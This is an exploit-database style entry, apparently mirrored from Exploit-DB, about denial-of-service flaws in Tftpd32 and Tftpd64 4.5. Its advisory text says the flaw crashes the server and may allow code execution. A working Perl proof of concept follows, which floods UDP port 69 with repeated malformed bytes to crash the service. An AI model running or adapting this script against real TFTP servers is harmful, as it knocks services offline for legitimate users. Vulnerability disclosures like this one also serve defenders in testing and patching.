Tftpd32 and Tftpd64 Denial-of-Service Vulnerabilities

vendor:

by:

N/A

CVSS

N/A

Denial-of-Service

CWE

Product Name:

Affected Version From: Tftpd32 4.5

Affected Version To: Tftpd64 4.5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Tftpd32 and Tftpd64 Denial-of-Service Vulnerabilities

An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, code-execution may be possible; however this has not been confirmed.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/67404/info

Tftpd32 and Tftpd64 are prone to denial-of-service vulnerabilities.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, code-execution may be possible; however this has not been confirmed.

The following products are vulnerable:

Tftpd32 4.5
Tftpd64 4.5

#!/usr/bin/perl -w
 
use IO::Socket;
 
for (my $j = 0; $j < 2; $j++)
{
    sleep(2);
    for (my $i = 0; $i < 1500; $i++)
    {
        $st_socket = IO::Socket::INET->new(Proto=>'udp', 
PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
     
        $p_c_buffer = "\x0c\x0d" x 10;
     
        print $st_socket $p_c_buffer;
     
        close($st_socket);
 
        print "sent " . $i . "\n";
    }
}
 
exit;